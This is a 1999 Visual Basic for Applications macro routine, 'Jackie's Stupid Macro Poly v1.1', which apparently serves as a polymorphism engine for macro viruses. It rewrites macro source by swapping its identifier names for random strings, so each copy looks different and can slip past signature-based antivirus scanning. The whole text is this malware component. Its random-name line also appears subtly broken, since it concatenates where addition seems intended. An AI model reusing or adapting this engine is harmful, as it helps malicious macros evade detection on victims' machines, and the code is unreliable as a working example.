Private Function JSMP(OurCode)
Dim VARIABLE(0 To 5)
VARIABLE(0) = "JSMP": VARIABLE(1) = "OurCode": VARIABLE(2) = "VARIABLE": VARIABLE(3) = "VARLOOP": VARIABLE(4) = "NEWVAR": VARIABLE(5) = "VARPOS"
VARPOS = 1
For VARLOOP = 0 To 5
NEWVAR = Chr(65 & Int(Rnd * 22)) & Chr(65 & Int(Rnd * 22)) & Chr(65 & Int(Rnd * 22)) & Chr(65 & Int(Rnd * 22))
Do
VARPOS = InStr(VARPOS + 1, OurCode, VARIABLE(VARLOOP))
If VARPOS <> 0 Then OurCode = Mid(OurCode, 1, (VARPOS - 1)) & NEWVAR & Mid(OurCode, (VARPOS + Len(VARIABLE(VARLOOP))), Len(OurCode))
Loop While VARPOS
Next
JSMP = OurCode
End Function

'Jackie's Stupid Macro Poly v1.1

July 1999